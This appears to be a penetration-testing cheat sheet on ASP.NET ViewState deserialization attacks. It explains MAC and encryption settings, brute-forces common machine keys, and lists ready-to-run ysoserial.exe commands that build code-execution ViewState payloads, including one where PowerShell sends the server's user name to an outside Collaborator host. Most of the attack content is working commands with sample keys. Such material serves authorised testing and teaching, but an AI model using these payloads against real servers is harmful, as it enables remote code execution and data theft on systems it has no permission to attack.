View State - Documentation

Link to this headingView State

View State:
Used in the ASP.net framework. This hidden input field is the state of the page and its controls. Can contain serialized data

Event Validation:
Checks incoming data to validate possible values and return errors when invalid data is submitted.

Serialization Formats:

ObjectStateFormatter: Default Deserializer
LOSFormatter: Default Serializer
BinaryFormatter:

Common Parameters and Cookies:

__PREVIOUSPAGE
__VIEWSTATE
.aspxauth
asp.net.applicationcookie
__VIWESTATEGENERATOR

Link to this headingMAC Enabled

Types of MACs:

[SHA1](/Crypto/Hash Functions/SHA1)
[AES](/Crypto/Symmetric Encryption/AES)
[MD5](/Crypto/Hash Functions/MD5)
HMACSHA256
HMACSHA384
HMACSHA512

Link to this headingBlackbox Testing

Check if error returned with the following command

curl https://victim.com/path/page.aspx?__VIEWSTATE=AAAA

Link to this headingLeaking the Validation Key

Can be found in the web.config file under the machineKey tag. Otherwise it must be leaked with a Information Disclosure vulnerability.

Test Common Validation Keys:

#Take data from AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie

Link to this headingEncrypted

Types of Encryption:

[AES](/Crypto/Symmetric Encryption/AES) (Default)
3DES
[DES](/Crypto/Symmetric Encryption/DES)

Link to this headingBlack Box Testing

Remove the __VIEWSTATEENCRYPTED parameter from the request and test the deserialization. If it returns a Viewstate MAC validation error then it confirms that a MAC is enabled

Link to this headingLeaking the Encryption Key

Usually found in the web.config or machine.config files

AES256Decryptor
Test Common AES Encryption Keys:

#Take data from the data from __VIEWSTATE, parameter python decrypter.py --data "DACE7CF24FF4901DF59CAAACDA1EBDEA" --format hex python decrypter.py --data "2s588k/0kB31nKqs2h696g==" --format base64

Test Common Encryption Keys against the ViewState:

#Take data from the data from __VIEWSTATE AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata Ve3mZjZwbMRyGTts1EV0F7Hp4eAx11qmXi45oAE7/bDDmA55+Kf9+WWACzUQtly4pRQYkMgmZJnJIDCQQhLNCWaHKbgY7dOiHn8JE7Yx19xvVhYyoqnC8ITLvHiiuJl8+LFmPJwS7ip3vAe+o7mxg2H15VUW5LO56AiTErT7UUw4Au002vflZUF6h/Fx/TJAYciUlZ8CmNW9/GIoPAC9tQ4SVhGD7is8Gu8DiUJE0AjHTLQFcy9vgSk1ovpy4gn9gl98mNVk17uCI7LLYPkvO3Xuix2WTogyqaPQOn7gJz7Say/aqqhmW90LdGo0qeldEUvMGw== --decrypt --purpose=viewstate --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

Test Common Encryption Keys against the asp.net.applicationcookie:

#Take data from the data from asp.net.applicationcookie AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie

Test Common Encryption Keys against the .aspxauth cookie:

#Take data from the data from __VIEWSTATE AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata CA387A93AD4214F356ED05C26C1E4D80F0804CD526766778B62D4F9213B87B5369755F95008A34644B9CA6B7646E191958A1AE14DB398AB943D3DB042EDA06EC4B5BEA9E3EB60E9877646AD4A50BE9435A2D3B4B3005836CBBBDA64A5E8738511211AA1F --decrypt --purpose=aspxauth

Link to this headingPayloads

Test Exploit with MAC Disabled:

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "nslookup test.burpcollaborator.net" > payload_when_mac_disabled ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://test.burpcollaborator.net/$env:UserName" > payload_when_mac_disabled #Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC Enabled:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --islegacy --isdebug --validationalg="SHA1" --validationkey="011165C2E613D02353C3C59EBECAE15F2EB8D4075D05B04CCD9075F26B80503CFE44C7099E3B97EDD4537B8F98D274784FABF5EBCAB255F861B2CEAE82750EB0" --apppath="/" --path="Hello.aspx" > payload_for_blog.txt #Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup test.burpcollaborator.net" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" > payload_for_blog.txt #Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" > payload_for_blog.txt #Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled with ViewStateUserKey used:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" --viewstateuserkey="randomstringdefinedintheserver" > payload_for_blog.txt #Set output as POST Parameter __VIEWSTATE=$output

Tools: